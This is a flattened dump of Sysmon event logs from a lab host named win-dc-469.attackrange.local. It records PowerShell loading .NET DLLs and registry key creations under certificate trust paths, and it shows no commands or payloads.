12:18:44.090{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\21ae9089eba57af8d90c2696ddf8620c\Microsoft.CSharp.ni.dll4.8.3761.0Microsoft.CSharp.dllMicrosoft® .NET FrameworkMicrosoft CorporationMicrosoft.CSharp.dllMD5=964847567F390EECD11E2314B6FE3CB1,SHA256=3897257C98046CE789A0520914D7012ECA59924FD67245095D2DB1A08E3B4A0Efalse-Unavailable 12241200x800000000000000057347540Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.239{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347539Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.239{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347538Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347537Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347536Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347535Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347534Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347533Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347532Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057347531Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.063{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=D17E11DDF716089AF736DBA7C4F24C75,SHA256=DF301F2F2A735A1A75EAE79E64CCFDAD335E319B98316E9E875F726FA2CB51D5trueMicrosoft CorporationValid 12241200x800000000000000057347530Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347529Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347528Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347527Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347526Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347525Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347524Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347523Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347522Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347521Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347520Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347519Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347518Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347517Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347516Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347515Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347514Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.233{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347513Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.059{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 12241200x800000000000000057347512Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.218{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347511Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.217{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347510Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.048{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\c4a9ae053d0ac0645c08ae81f083121d\System.Transactions.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=992BDD0BA5CA1305C35337080E779862,SHA256=37D038879A46694553D2D62090B2C34B5C4A6310B753DBE8E5AC80AE90700D21false-Unavailable 12241200x800000000000000057347509Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.207{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347508Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.207{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347507Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.038{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\44471e4b0e7b143ba574354f8937ee2c\Microsoft.PowerShell.Security.ni.dll10.0.14393.2848Microsoft Windows PowerShell Management CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Security.dllMD5=EC09E92E968F15B182014DFF6452C459,SHA256=7A6F5511CA622E29367F6ED25A0E924C4BD1DD8D8CAC594119F1555B208C43DDfalse-Unavailable 12241200x800000000000000057347506Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.201{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347505Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.201{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347504Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347503Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347502Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347501Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347500Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347499Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347498Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347497Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347496Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347495Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347494Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057347493Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.029{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 12241200x800000000000000057347492Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347491Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347490Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347489Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347488Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347487Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347486Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347485Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347484Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.200{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347483Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.199{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347482Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.199{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347481Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.199{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347480Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.190{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347479Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.189{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347478Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.189{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347477Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.189{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347476Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.189{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347475Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.189{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347474Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.189{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347473Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.189{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347472Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.189{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347471Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347470Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347469Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347468Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347467Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347466Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347465Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347464Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057347463Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.997{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=FD7801997C3D60A432EAC5A08DF42C37,SHA256=E27CFC72999B8AB72BB0EAF1B75F13826C644CAF2F97980CC4A3AD3FE2D98BBEtrueMicrosoft CorporationValid 12241200x800000000000000057347462Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347461Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347460Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347459Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347458Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347457Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347456Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.188{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347455Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.167{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347454Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.957{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\0fa7d4546f2b433a475b782745fe3354\System.Data.ni.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=5880059EC43D513D3D2B58BB915ADE73,SHA256=338F7838E9D1CD563FD832A382B9CCB1591D59A7280FC7001D29D912909CBBBEfalse-Unavailable 12241200x800000000000000057347453Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347452Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347451Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347450Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 